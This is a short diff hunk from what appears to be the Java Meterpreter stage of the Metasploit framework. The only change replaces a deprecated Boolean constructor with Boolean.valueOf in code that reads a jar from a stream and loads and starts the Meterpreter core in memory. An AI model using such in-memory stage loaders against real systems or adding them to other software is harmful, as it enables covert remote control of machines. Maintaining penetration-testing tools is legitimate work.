@@ -18,7 +18,7 @@ public class Meterpreter implements Stage {
         byte[] core = new byte[coreLen];
         in.readFully(core);
         URL coreURL = MemoryBufferURLConnection.createURL(core, "application/jar");
-        new URLClassLoader(new URL[]{coreURL}, getClass().getClassLoader()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[]{DataInputStream.class, OutputStream.class, boolean.class, boolean.class}).newInstance(in, out, Boolean.TRUE, new Boolean(!noRedirectError));
+        new URLClassLoader(new URL[]{coreURL}, getClass().getClassLoader()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[]{DataInputStream.class, OutputStream.class, boolean.class, boolean.class}).newInstance(in, out, Boolean.TRUE, Boolean.valueOf(!noRedirectError));
         in.close();
         out.close();
     }
